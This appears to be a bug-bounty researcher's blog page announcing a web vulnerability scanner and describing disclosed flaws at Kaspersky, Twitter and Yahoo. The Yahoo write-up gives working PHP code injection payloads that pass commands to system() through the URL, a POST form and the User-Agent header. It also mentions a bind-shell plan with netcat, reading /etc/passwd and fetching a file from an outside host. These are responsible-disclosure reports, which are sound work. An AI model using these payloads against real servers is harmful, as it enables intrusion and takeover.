Posts by: zigoo

Yahoo! RCE Detector WebPwn3r Released.

Yahoo! RCE Detector WebPwn3r Released.

 

 

logo_603012_a948usc9f_screen_display

Hello Everyone,

Today blog post is about WebPwn3r 🙂

For those who never heared about WebPwn3r, let me introduce it to you.

pwn3r
WebPwn3r is a Web Applications Security Scanner coded in Python to help Security Researchers to scan Multiple links in the same time against Remote Code/Command Execution & XSS Vulnerabilities.

You can extract the URL’s from Burp Suite and save it in list.txt then pass it to WebPwn3r.

You can also use your own crowler to gather URL’s for a certain domain or a random domains, and save it in list.txt then pass it to WebPwn3r.

In it’s Public Demo version, WebPwn3r got below Features:

1- Scan a URL or List of URL’s
2- Detect and Exploit Remote Code  Injection Vulnerabilities.
3- ~ ~ ~ Remote Command  Execution Vulnerabilities.
4- ~ ~ ~ Typical XSS Vulnerabilities.
5- Detect WebKnight WAF.
6- Improved Payloads to bypass Security Filters/WAF’s.
7- Finger-Print the backend Technologies.

The tool is under a heavy development 🙂

Demo Video for the tool:

Success Stories:

WebPwn3r

To download the Tool:

https://github.com/zigoo0/webpwn3r

Kaspersky.com Unvalidated Redirection Vulnerability.

Kaspersky.com Unvalidated Redirection Vulnerability.

10105.gif

Would you trust a link from your security vendor? Absolutely Yes! But imagine your security vendor is asking you to download a malware!

During my researches on Kaspersky.com I found “Unvalidated Redirection Vulnerability ” that could be used by attackers to trick Kaspersky.com users into visitng Malicious web-sites!

To demonstrate the impact of such vulnerabilities I made a video to simulate a black-hat method to use this vulnerability to spread a Malware.

Video POC:

The consequences of unfixing of such vulnerability are critical
  • Wide infection – since the redirection is coming from a trusted source especially if the attacker registered a domain name similar to Kaspersky.com
  • Very bad reputation for Kaspersky company.
  • Your most trusted resource “Your Antivirus” will be your worst enemy! Would you trust anything else!
And many other consequences. The vulnerability was reported to Kaspersky web-team and is now fixed.

Twitter.com Unrestricted File Upload Vulnerability.

Twitter.com Unrestricted File Upload Vulnerability.

Critical vulnerability in Twitter allows attacker to upload Unrestricted Files
Hello,

Twitter Acknowledged me on their Hall of Fame for finding and reporting Two Vulnerabilities in their web site.

Those two vulnerabilities are:

1- Unrestricted File Upload Vulnerability.

 

The POC:

When an application does not validate or improperly validates file types before uploading files to the system, called Unrestricted File upload vulnerability.
Such flaws allow an attacker to upload and execute arbitrary code on the target system which could result in execution of arbitrary HTML and script code or system compromise.

2- Unvalidated Redirection Vulnerabilit

This vulnerability could be used by Attackers to conduct Phishing and malware spreading attacks against Twitter users.

Link to Twitter Hall Of Fame:

https://twitter.com/about/security

Yahoo! Remote Command Execution Vulnerability.

Yahoo! Remote Command Execution Vulnerability.

Yahoo-Hacked
Hello Everyone,

This is my first writeup for the blog, which I choose to be about “Yahoo Remote Code Execution” Vulnerability.

The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.

Vulnerability Link:

http://tw.user.mall.yahoo.com/rating/list?sid=$Vulnerability

Payload:

${@print(system(“whoami”))}

Note:

The server got many other Yahoo! sub-domains!

What is “Remote PHP Code Injection” ?

Simply, PHPCI occurs when user-supplied(GET/POST) values of the parameters are reflected inside eval() function, that vulnerability  allows attackers to execute PHP code such as system(“id”) or any other php function/code.

325673248_640

That said, I was able to inject PHP code by manuplating the value of the parameter “sid”.

In the beginning I tried to check the directories and files by “dir” using the SYSTEM function:
http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“dir”))}

gedo1

Indeed I need a better view!, so I tried with system(“ls -la”) But!?
It didn’t work! it does not accept any spaces in the url!!

what Actually I need a good proof of concept to explain to Yahoo! Security Team how dangerous is this vulnerability, despite the number of Yahoo! sub-domains hosted on the same server.
So I tried to bypass that issue by some tricks including URL ENCODING the space with %20 but it didn’t work. Same result with double URL encoding!

e.g. http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“ls%20-la”))}

I also tried to go arround by using the function file_get_contents(“http://sec-down.com/poc.txt”) but this one dosen’t work because of the folder permissions, did you say do it in /tmp ?!

I thought of:

1- uploading “bind.sh” which is a bind connection script, into /tmp directory

2- Execute it to make a bind connection with the server

.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system(“./tmp/bind.sh”))}

3- Receive the connection from the server on Netcat and now I will be free to run whatever Commands 😀

But actually Netcat is a Hacking tool! it also could be detected by any simple AV/IDS on the system! this could corrupt the whole thing!
I’ve to go for another solution.

Thanks to Ahmed Abul-Ela and Ibrahim Mosaad I was able to execute commands using system($_POST[‘x2’])

POC:

<form method=”POST” action=”http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_POST[‘x2’]))}“>
<input type=”text” name=”x2″>
<input type=”submit”></form>

Also by using  system($_SERVER[‘HTTP_USER_AGENT’]) and then inject my commands inside the userAgent.
.e.g http://tw.user.mall.yahoo.com/rating/list?sid=${@print(system($_SERVER[‘HTTP_USER_AGENT’]))}

Yea I know there have been other good tricks such as using readfile(“/etc/passwd”) and many more, despite the adrenaline I had, but as you know those ideas never come to mind when you need it 😀

Sample POC for the Vulnerability [Allowed by Yahoo! to be public]:

TIMELINE:

Jan 20, 2014 at 6:39 PM – Intial Report to Yahoo! Security Team.

Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo! that server kernel was old one with a well known “Local Privilage Esclation” vulnerability which means an attacker with such vulnerability can gain ROOT ACCESS to the server!!!!

Jan 21, 2014 at 6:44 PM – Yahoo! Acknowledged the vulnerability and pushed a Fix for it.

fixed

Thanks to Yahoo! Security team for the fast fix release.

BTW No news about the bounty yet!

Follow me: twitter.com/zigoo0

2 of 2
12